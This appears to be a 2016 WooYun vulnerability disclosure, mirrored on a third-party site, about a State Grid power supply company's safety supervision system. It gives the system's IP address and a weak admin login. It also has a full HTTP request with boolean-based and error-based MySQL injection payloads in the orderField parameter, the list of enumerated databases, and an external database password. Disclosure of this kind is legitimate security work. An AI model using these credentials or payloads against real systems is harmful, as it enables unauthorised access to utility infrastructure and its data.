乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-15: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
国网某供电公司安全监督系统弱口令
http://115.29.111.94:8080/user:admin pass:1
注入一枚:orderField参数
POST /corerole/list.do HTTP/1.1Host: 115.29.111.94:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://115.29.111.94:8080/index/index.doContent-Length: 55Cookie: JSESSIONID=1E1D54B77538A4DC13005A2646DC44E2Connection: keep-alivepageNum=1&numPerPage=15&orderField=&orderDirection=asc
---Parameter: orderField (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: pageNum=1&numPerPage=15&orderField=(SELECT (CASE WHEN (5347=5347) THEN 5347 ELSE 5347*(SELECT 5347 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&orderDirection=asc Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: pageNum=1&numPerPage=15&orderField=(SELECT 3200 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT(ELT(3200=3200,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&orderDirection=asc---
available databases [7]:[*] benxi[*] guoduo[*] information_schema[*] mianyang_tools[*] mysql[*] performance_schema[*] shimen
开启了外联 密码为:cnksi.com
------不知道是不是root密码和注入通用的,但没找到其他站点就提到国网了~
www.cnksi.com找客服
危害等级:低
漏洞Rank:3
确认时间:2016-01-15 16:11
感谢对国网安全的关注!
暂无